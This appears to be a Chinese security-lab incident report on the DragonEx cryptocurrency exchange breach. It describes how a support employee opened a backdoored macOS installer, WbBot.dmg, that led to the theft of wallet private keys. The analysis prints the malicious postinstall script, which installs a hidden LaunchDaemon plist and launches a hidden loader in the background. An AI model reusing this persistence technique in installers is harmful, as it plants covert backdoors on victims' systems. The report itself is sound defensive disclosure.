事件
近日,DragonEx龙网交易所安全事件中,记者(johnwick.io)第一时间与龙网积极取得联系,与龙网一起分析和确认,客服曾经从陌生人处获取并打开了一个Apple OS X下“交易软件”安装包WbBot.dmg (SHA256哈希****7DEC218E815A6EB399E3B559A8962EE46418A4E765D96D352335********),此安装包经记者技术分析存在捆绑后门,黑客通过此安装包内后门获取内部人员权限渗透进内网进而成功获取数字货币钱包私钥。
分析
此dmg样本经过层层解包,最终层次结构如下:
其中的postinstall(绿色高亮)是后门的bash安装脚本,内容如下:
#! /bin/sh
mv /Applications/WbBot.app/Contents/Resources/.com.wbbot.plist/Library/LaunchDaemons/com.wbbot.plist
/Applications/WbBot.app/Contents/Resources/.loaderPackageValidate &
可见,该后门本体就是位于WbBot.app/Contents/Resources/.loader(蓝色高亮行,SHA256哈希:****107c09f591a11e5e347acad5b47c70ff5d5641a01647854643e0********)。
经过初步分析,确定为恶意后门。
小结
记者认为这是一次典型的专业级黑客攻击,记者正在积极配合龙网追踪被盗资产,目前已经联系多家交易所,对被盗资产进行冻结处理,关于此事件的更深入分析请关注记者的后续报告,同时提醒其他数字货币交易所以及个人用户提升安全意识并且采取必要的安全策略保护自身,不要轻易信任第三方用户。
来源:降维安全实验室